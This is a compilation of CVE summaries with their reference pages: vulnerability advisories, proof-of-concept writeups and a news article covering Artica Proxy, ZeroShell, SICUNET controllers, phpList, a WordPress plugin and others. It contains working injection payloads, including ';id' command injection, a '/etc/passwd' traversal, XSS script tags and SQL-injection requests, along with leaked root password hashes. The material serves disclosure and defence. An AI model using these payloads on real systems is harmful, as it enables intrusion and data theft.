In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side Template Injection, allowing for remote code execution.

CVE-2021-41749: craft-seomatic/CHANGELOG.md at develop · nystudio107/craft-seomatic

GUnet Open eClass (aka openeclass) before 3.12.2 allows XSS via the modules/auth/formuser.php auth parameter.

**Υποστήριξη Διαδραστικού Περιεχομένου τύπου H5P**

*   Ενσωμάτωση διαδραστικού περιεχομένου τύπου H5P (https://h5p.org/) στα μαθήματα.
    
*   Υποστήριξη εισαγωγής και δημιουργίας / διόρθωσης.
    

**Πιστοποίηση χρηστών**

*   Διόρθωση και αναβάθμιση του τρόπου πιστοποίησης χρηστών μέσω λογαριασμών κοινωνικών δικτύων (π.χ. Twitter, Facebook, Google, κ.λπ.)
    

**Δικαιώματα χρηστών**

*   Διάφορες διορθώσεις στα δικαιώματα του χρήστη διαχειριστή τμημάτων.
    

**Θεματικές ενότητες**

*   Προσθήκη _Διαδραστικού περιεχομένου H5P_, _Ιστολογίου_ στις ενότητες του μαθήματος.
    

**Ανανέωση μαθήματος**

*   Επιλογής απόκρυψης εργασιών
    

**Ομάδες χρηστών**

*   Διορθώσεις
    

**Γραμμή μάθησης**

*   Διορθώσεις
    

**Γενικά**

*   Υποστήριξη της έκδοσης PHP 8.0

CVE-2021-44266: Open eClass Documentation

ZeroShell 3.9.5 has a command injection vulnerability in /cgi-bin/kerbynet IP parameter, which may allow an authenticated attacker to execute system commands.

Sep 26, 2021

**Artica Proxy 4.30 cyrus.events.php RCE**

Vendor && Product www.articatech.com Artica Web Proxy v4.30.000000 Download: http://www.articatech.com/download.php Reproduction Login the web account, use this poc Because the execution result is not echoed, we view the result by writing a file https://192.168.108.14:9000/cyrus.events.php?logs= ​ POST: rp=;id>../1.txt; access https://192.168.108.14:9000/1.txt, we can see the execution result.

Vulnerability

2 min read

**Artica Proxy 4.30 cyrus.events.php RCE**

**Vendor && Product**

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

**Reproduction**

Login the web account, use this poc

> _Because the execution result is not echoed, we view the result by writing a file_

https://192.168.108.14:9000/cyrus.events.php?logs=  
 ​  
 POST:  
 rp=;id>../1.txt;

access https://192.168.108.14:9000/1.txt, we can see the execution result.

\--

\--

Sep 24, 2021

**Zeroshell 3.9.5 Authenticated RCE**

The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter. IP parameters are used in two places: POC: /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=

Vulnerability

1 min read

**Zeroshell 3.9.5 Authenticated RCE**

The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter.

IP parameters are used in two places:

POC:

/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=

\--

\--

CVE-2021-41738: rootless – Medium

A vulnerability was found in SICUNET Access Controller 0.32-05z. It has been declared as problematic. This vulnerability affects unknown code of the component Password Storage. The manipulation leads to weak encryption. Attacking locally is a requirement.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****SICUNET Physical Access Controller - Multiple Vulnerabilities**

_From_: Andrew Griffiths <agriffiths+fd () google com>  
_Date_: Wed, 8 Mar 2017 11:17:13 -0800  

SICUNET Physical Access Controller - Multiple Vulnerabilities

-------------------------------------------------------------

Introduction

============

Multiple vulnerabilities were identified in the SICUNET Access Controller
Products. The vulnerabilities were discovered during a black box security
assessment and therefore the vulnerability list should not be considered
exhaustive.

Affected Software and Versions

==============================

Known vulnerable version is 0.32-05z. This version string was taken from
Spider.db.

CVE

===

No CVEs have been assigned.

Vulnerability Overview

======================

0. SN-01: HIGH: Outdated software

1. SN-02: HIGH: PHP include()

2. SN-03: CRITICAL: Unauthenticated remote code execution

3. SN-04: CRITICAL: Hardcoded root credentials

4. SN-05: High: Passwords stored in plaintext

Vulnerability Details

=====================

------------------------

SN-01: Outdated software

------------------------

Severity: High

A variety of software running on the device is outdated, making
exploitation of certain bugs far easier than it would be had they been
patched, or running up to date software.

 /usr/local/php\_b2/bin # ./php -v

 PHP 5.2.14 (cli) (built: Jul  8 2012 22:45:11)

 Copyright (c) 1997-2010 The PHP Group

 Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

http://php.net/eol.php has more information about PHP 5.2 being End Of
Life, and associated security issues.

 /usr/local/lighttpd/sbin # ./arm-linux-lighttpd -v

 lighttpd/1.4.30 (ssl) - a light and fast webserver

 Build-Date: Dec 26 2013 15:13:53

https://www.lighttpd.net/download/ has more information about security
changes in lighttpd.

 # uname -a
 Linux SICUNET 2.6.32.9 #72 PREEMPT Tue Feb 28 15:25:12 KST 2012 armv7l
 GNU/Linux


It is recommended that software is kept up to date, and that configurations
are reviewed to ensure that they’re secure. For example, there may have
been configuration options for PHP which may have made exploitation harder.

--------------------

SN-02: PHP include()

--------------------

Severity: High

When sending a request to /, the 'c' parameter is used as part of an
include() statement.

Excerpt from /spider/web/webroot/index.php:

 $class  = Input::get('c', 'layout');
 $method = Input::get('m', 'index');

 include APP\_DIR.'/controllers/'.$class.EXT;

(where EXT is defined as '.php’).

By crafting the c parameter, it’s possible to access arbitrary files on the
device:

 wget 'http://victim.ip.address/?c=../../../../../etc/passwd%00&apos;

The %00 trick is a known issue, and is addressed in a later PHP update. For
more information, please see SN-01.

It is recommended that the code be refactored to not require passing user
supplied input to the include() function. Alternatively, a strict whitelist
approach of known modules may be used instead.

--------------------------------------------

SN-03: Unauthenticated remote code execution

--------------------------------------------

Severity: Critical

A variety of functionality is implemented via insecure string concatenation
then passed to underlying exec() functions:

For example, in card\_scan\_decoder.php

16     $No = $\_GET\['No'\];
17     $door = $\_GET\['door'\];
18
19     $result = array();
20
21     $db   = new PDO('sqlite:/tmp/SpiderDB/Spider.db');
<snip>

27
28     if ($No < 1)
29     {
30         $DelTemp = $db->prepare("DELETE FROM CardRawData");
31         $DelTemp->execute();
32
33         exec("/spider/sicu/spider-cgi getrawdata ".$door." on");
34     }

This vulnerability can be exploited by:

 wget 'http://victim.ip.address/card\_scan\_decoder.php?No=0&door=$(sleep 3)’

This is just an example of the pattern of insecurely creating strings to be
executed, and not an exhaustive listing.

It is recommended that injection-proof API's are used instead of
error-prone string concatenation, or whitelist / blacklist being used (for
example, escapeshellcmd). However, it appears as if the closest option in
PHP is http://php.net/manual/en/function.pcntl-exec.php which requires the
user to perform a lot more work to avoid shooting themselves in the foot
(such as forking the process first).

---------------------------------

SN-04: Hardcoded root credentials

---------------------------------

Severity: Critical

There are 3 password fingerprints in /etc/passwd

 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
 e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux
User,,,:/home/e3user:/bin/sh
 lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux
User,,,:/home/lighttpd:/bin/sh

The plaintext root password can be found in /spider/sicu binaries. The root
password may be used for the ftp or telnet service on the device. From our
observation, it appears as if FTP is running by default, along with the
ability to login as root via FTP.

The hardcoded root credentials are used by binaries on the system to run
commands as root. It is currently unknown what the purpose of the e3user
and lighttpd hardcoded passwords are.

For example, the root password is used in a variety of ways in the
following format:

 echo %s | su -c 'mkdir -p %s >& /tmp/message'
 echo %s | su -c 'chown %s %s >& /tmp/message'

Where %s is replaced at run time with the cleartext root password before
being passed to the system() function.

It is recommended that hardcoded credentials be removed, and instead
replaced with a more suitable mechanism. For example; sudo may be suitable,
combined with the NOPASSWD directive.

FTP access should be replaced with a more secure transfer mechanism (such
as SSH FTP, or SCP), and authentication should be managed by a user
(preferably via SSH public keys).

------------------------------------------

SN-05: Passwords stored in plaintext

------------------------------------------

Severity: High

A variety of credentials (for example, used for accessing the web front
end, or other devices part of the installation) are stored unencrypted on
the device in /tmp/SpiderDB/Spider.db:

sqlite> SELECT Name,Password FROM WebUser;
admin|ExamplePlaintextPassword
sqlite> SELECT Name,ID,Password FROM Controller;
Server|username|AnotherPlaintextPassword

It is recommended that where passwords must be stored, that they are
suitably cryptographically hashed using an appropriate standard (for more
information, please see https://password-hashing.net).

Author

======

The vulnerabilities were discovered by Andrew Griffiths from Google
Security Team.

Timeline

========

2016/12/06 - Contacted sicunet.com domain registrar, and sales () sicunet com
            for a point of contact to report security issues.

2016/12/08 - Pinged earlier email for a point of contact, additionally
            included tech () sicunet com on an email.

2016/12/08 - Report sent to Ike Huh, CEO.

2016/12/12 - Mentioned that reviewing spider-api would be worthwhile as it
            listens on port 7000, and strings suggests that there may be
            command injection / other vulnerabilities. No reply.

2017/01/17 - Asked point of contact if they had any questions about the
            advisory sent earlier. No reply.

2017/01/24 - Pinged vendor again, asked about resellers who may be able to
            make recommendations about restricting network access to the
            devices from the internet.

2017/01/30 - No contact from vendor.

2017/02/24 - Asked vendor if the affected users can expect patches. No
            reply.

2017/03/01 - Sent an email to the vendor, reminding them disclosure is
coming
            up soon.

2017/03/08 - 90 day disclosure deadline.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SICUNET Physical Access Controller - Multiple Vulnerabilities** _Andrew Griffiths (Mar 10)_

CVE-2017-20040: Full Disclosure: SICUNET Physical Access Controller

dynamicMarkt <= 3.10 is affected by SQL injection in the parent parameter of index.php.

**Bastian Groth Internet Service**

{{commentsTotalLength}} KommentarKommentare

Hersteller:

Zur Website

Preis:

349 EUR

Lizenz:

Kostenpflichtig

Betriebssystem:

Linux

Download-Größe:

5120 KByte

Downloadrang:

27274

Datensatz zuletzt aktualisiert:

07.06.2018

_Alle Angaben ohne Gewähr_

  

Shop-Software für Festpreis-, Auktions- und Kleinanzeigen-Markt; der Online-Marktplatz unterstützt Deutsch und Englisch, bietet individuelle Kategorien sowie Layouts und erlaubt Nutzern, sich alle Angebote eines Verkäufers anzusehen

**dynamicMarkt 3.10 - Marktplatz Software**

()

**Das könnte dich auch interessieren**

CVE-2021-41754: dynamicMarkt 3.10 - Marktplatz Software

ITOP v3.0.1 was discovered to contain a cross-site scripting (XSS) vulnerability via /itop/webservices/export-v2.php.

iTop Store  
Find Extensions

iTop University  
Read Documentation

iTop Community  
Browse Forums & Downloads

*   

**What is iTop Hub ?**

iTop Hub is a platform providing you with all the required resources to optimize your iTop.

By joining us, you will be able to learn how to use iTop, to customize your instances to better fit your processes and to contribute to a growing and active community of users !

More

**What is iTop ?**

iTop is an open source ITSM solution allowing you to manage your configuration items and their relationships in a flexible CMDB.

ITIL oriented, iTop enables you to manage your user requests, incidents, problems, changes and service catalog in a single platform.

More

Configure user actions to simplify and automate processes (e.g. create an incident from a CI).

Send an email to pre-configured contacts when a ticket log is updated

Automatically create and update Tickets from incoming emails

Define personalized request forms based on the service catalog. Add extra fields for a given type of request

Guide to all our extensions

Join & contribute to our forums !

**Learn how to use iTop on your own !**

Find all the documentation you need & learn faster by joining our boot camp training or watching our video tutorials. 

**Customize your instances quickly & easily**

Downloads extensions & discover all of the Hub's personalized functionalities to help your better use iTop wide range of possibilities !

CVE-2022-31402: iTop Hub is the ITSM & CMDB open source community toolset.

WordPress Motopress Hotel Booking Lite plugin version 4.2.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)# Date: 2022-06-05# Exploit Author: Sanjay Singh# Vendor Homepage: https://motopress.com/# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip# Version: 4.2.4# Tested on: Windows/XAMPP###########################################################################PoC:1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type2. Click on "Add Accommodation Type".3. Add title payload= "><script>alert("XSS")</script>4. Excerpt input payload "><script>alert("XSS")</script>5. Click publish.6. Visit http://localhost/accommodations/7. XSS payload execute.

WordPress Motopress Hotel Booking Lite 4.2.4 Cross Site Scripting

A Privilege Escalation vulnerability exists in Sourcecodester Money Transfer Management System 1.0, which allows a remote malicious user to gain elevated privileges to the Admin role via any URL.

\# Exploit Title: Privilege Escalation via Forced Browsing

\# Google Dork: NA

\# Date: 11/03/2022

\# Exploit Author: Ali J.

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html

\# Version: 1.0

\# Tested on: Windows 10

\# CVE : CVE-2021-44582

Steps to Reproduce:

1\. Login to the Money Transfer Management System with admin credentials and copy the URL.

2\. Logout from the admin role and login with the normal user credentials, observe the available modules on the left side.

3\. Paste the admin URL and observe that the application is vulnerable to Privilege Escalation via Forced Browsing.

CVE-2021-44582: CVE-2021-44582/Privilege Escalation via Forced Browsing in Sourcecodester Money Transfer Management System at main · warmachine-57/CVE-2021-44582

Sysadmins should update their installations immediately

Jessica Haworth 10 June 2022 at 12:34 UTC

Sysadmins should update their installations immediately

Two flaws in the web interface of a Fujitsu cloud storage system could allow an unauthenticated attacker to read, write, and destroy backed up files.

The security vulnerabilities were present in the enterprise-grade Fujitsu Eternus CS8000 (Control Center) V8.1.

Researchers from NCC Group found two separate issues due to a lack of user input validation in two PHP scripts, which are normally included post-authentication.

Both flaws, a command injection in and a command injection in , could allow an attacker to gain remote code execution on the appliance without prior authentication or authorization.

Read more of the latest web security research here

As no include-guards are in-place, the attacker is able to trigger the script without prior authentication by calling it directly.

This would enable them to take control over the appliance as if they were logged in directly via a secure shell.

“If exploited, the attacker obtains limited user privileges on the machine as the ‘www-data’ user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative ‘root’ user of the system,” a blog post from NCC Group reads.

“Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.”

**Patch now**

The issues were discovered during a penetration test conducted by NCC Group on behalf of a client. They were then reported to Fujitsu, which has since patched the bugs (PDF).

Fujitsu said it has “no knowledge” of any working exploit code, and has seen no successful attempts to exploit the vulnerabilities in the wild.

NCC Group advised users to upgrade to the latest version of the software immediately. It has also listed other recommendations to mitigate the bugs in the blog post.

The Daily Swig has reached out to both NCC Group and Fujitsu for comment and will update this article accordingly.

DON’T MISS Chinese cyber threat actors are widely abusing well-known attacks to infiltrate networks, CISA warns

Separate Fujitsu cloud storage vulnerabilities could enable attackers to destroy virtual backups

A vulnerability was found in PHPList 3.2.6. It has been rated as critical. Affected by this issue is some unknown functionality of the component Subscription. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.3.1 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: "Curesec Research Team (CRT)" <crt () curesec com>  
_Date_: Fri, 17 Mar 2017 09:42:51 +0100  

Security Advisory - Curesec Research Team

1. Introduction

Affected        phplist 3.2.6
Product:
Fixed in:       3.3.1
Fixed Version   https://sourceforge.net/projects/phplist/files/phplist/3.3.1/
Link:           phplist-3.3.1.zip/download
Vendor Website: https://www.phplist.org/
Vulnerability   SQL Injection
Type:
Remote          Yes
Exploitable:
Reported to     01/10/2017
vendor:
Disclosed to    02/20/2017
public:
Release mode:   Coordinated Release
CVE:            n/a (not requested)
Credits         Tim Coen of Curesec GmbH

2. Overview

phplist is an application to manage newsletters, written in PHP. In version
3.2.6, it is vulnerable to SQL injection.

The application contains two SQL injections, one of which is in the
administration area and one which requires no credentials. Additionally, at
least one query is not properly protected against injections. Furthermore, a
query in the administration area discloses some information on the password
hashes of users.

3. Details

SQL Injection 1: Edit Subscription

CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

It is possible for an unauthenticated user to perform an SQL injection when
updating the subscription information of an already subscribed user.

The protection against SQL injection relies on a combination of a custom magic
quotes function which applies addslashes to all input values and a function
which applies htmlspecialchars to all inputs. Additionally, some input values
are cast to integers to prevent injections. addslashes protects against
injections into arguments which are placed into single quotes, while
htmlspecialchars protects against injections into double quotes.

It should be noted that neither addslashes nor htmlspecialchars are recommended
to prevent SQL Injection.

The update functionality is vulnerable to SQL Injection as it uses the key of
POST data, while only values of POST data are escaped via addslashes, but not
keys.

Proof of Concept:

POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=
foo%40example.com HTTP/1.1 Host: localhost Connection: close Content-Length:
209 email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2
or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&
VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27

The proof of concept is chosen for simplicity and will only work if error
messages are displayed to the user. If this is not the case, other techniques
can be used to extract data from the database.

Code:

/lists/admin/subscribelib2.php $lists = ''; if (is\_array($\_POST\['list'\])) {
while (list($key, $val) = each($\_POST\['list'\])) { if ($val == 'signup') {
$result = Sql\_query("replace into {$GLOBALS\['tables'\]\['listuser'\]}
(userid,listid,entered) values($userid,$key,now())"); # $lists .= " \* ".$\_POST
\["listname"\]\[$key\]."\\n"; } } }

SQL Injection 2: Sending Campaign (Admin)

CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

When sending a campaign, the sendformat parameter is vulnerable to SQL
injection. The injection takes place into an UPDATE, so the easiest way to
extract data is via error based SQL injection.

An account with the right to send campaigns is required to exploit this issue.

Proof of Concept:

POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1 Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12 Connection: close Content-Length:
323 formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround\_fck\_bug=1&followupto=
http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling
&htmlformatted=auto&sendformat=HTML" or extractvalue(1,version()) -- - &id=2&
status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=

Code:

// /lists/admin/send\_core.php:198 $result = Sql\_Query( sprintf('update %s set
subject = "%s", fromfield = "%s", tofield = "%s", replyto ="%s", embargo =
"%s", repeatinterval = "%s", repeatuntil = "%s", message = "%s", textmessage =
"%s", footer = "%s", status = "%s", htmlformatted = "%s", sendformat = "%s",
template = "%s" where id = %d', $tables\['message'\], sql\_escape(strip\_tags
($messagedata\['campaigntitle'\])), /\* we store the title in the subject field.
Better would be to rename the DB column, but this will do for now \*/ sql\_escape
($messagedata\['fromfield'\]), sql\_escape($messagedata\['tofield'\]), sql\_escape
($messagedata\['replyto'\]), sprintf('d-d-d d:d', $messagedata\['embargo'\]
\['year'\], $messagedata\['embargo'\]\['month'\], $messagedata\['embargo'\]\['day'\],
$messagedata\['embargo'\]\['hour'\], $messagedata\['embargo'\]\['minute'\]),
$messagedata\['repeatinterval'\], sprintf('d-d-d d:d', $messagedata
\['repeatuntil'\]\['year'\], $messagedata\['repeatuntil'\]\['month'\], $messagedata
\['repeatuntil'\]\['day'\], $messagedata\['repeatuntil'\]\['hour'\], $messagedata
\['repeatuntil'\]\['minute'\]), sql\_escape($messagedata\['message'\]), sql\_escape
($messagedata\['textmessage'\]), sql\_escape($messagedata\['footer'\]), sql\_escape
($messagedata\['status'\]), $htmlformatted ? '1' : '0', $messagedata
\['sendformat'\], sql\_escape($messagedata\['template'\]), $id ) );

Sort By: Password (Admin)

CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N

When viewing users, the sortby parameter can be used to sort the list. The drop
down list allows sorting by email, dates, and so on. All non-word characters
are removed, but there are no further checks.

It is possible to gather some information on the password of users via this
parameter, as it is possible to set it to sort by password.

By repeatedly changing the password of an existing user, the characters of a
password hash could be bruteforced by looking at the position of the user the
attacker controls.

An account with the right to view users is required to exploit this issue.

Proof of Concept:

http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password
&sortorder=desc&change=Go&id=0&find=&findby=email

Insufficient Protection against SQL Injection

CVSS: n/a

When subscribing a user, metadata is saved in the database. When saving this
data in the database, it is neither properly escaped nor are prepared
statements used, but the input is HTML encoded.

Because of this, an unauthenticated user has control over part of the query.

This issue is not currently exploitable, but may be exploitable if changes are
made to the query. The approach of HTML encoding instead of using prepared
statements to defend against SQL injection is also more error prone and may
result in further queries which are vulnerable.

A user can create a database error with the following request:

POST /lists/index.php?p=subscribe&id=a\\ HTTP/1.1 Host: localhost Cookie:
PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4 Connection: close formtoken=
5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&
emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=
newsletter&VerificationCodeX=&subscribe=
Subscribe+to+the+selected+newsletters%27

The resulting query is:

insert into phplist\_user\_user\_history
(ip,userid,date,summary,detail,systeminfo) values("127.0.0.1",2,now
(),"Re-Subscription","\[...\]"," HTTP\_USER\_AGENT = \[...\] REQUEST\_URI = /lists/
index.php?p=subscribe&amp;id=a\\")

It can be seen that the slash in the request escapes the quote of the query
which causes an error.

4. Solution

To mitigate this issue please upgrade at least to version 3.3.1:

https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/
download

Please note that a newer version might already be available.

5. Report Timeline

01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/phplist-326-SQL-Injection-193.html
 
--
blog: https://www.curesec.com/blog
Atom Feed: https://www.curesec.com/blog/feed.xml
RSS Feed: https://www.curesec.com/blog/rss.xml
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **phplist 3.2.6: SQL Injection** _Curesec Research Team (CRT) (Mar 17)_

Tag

#php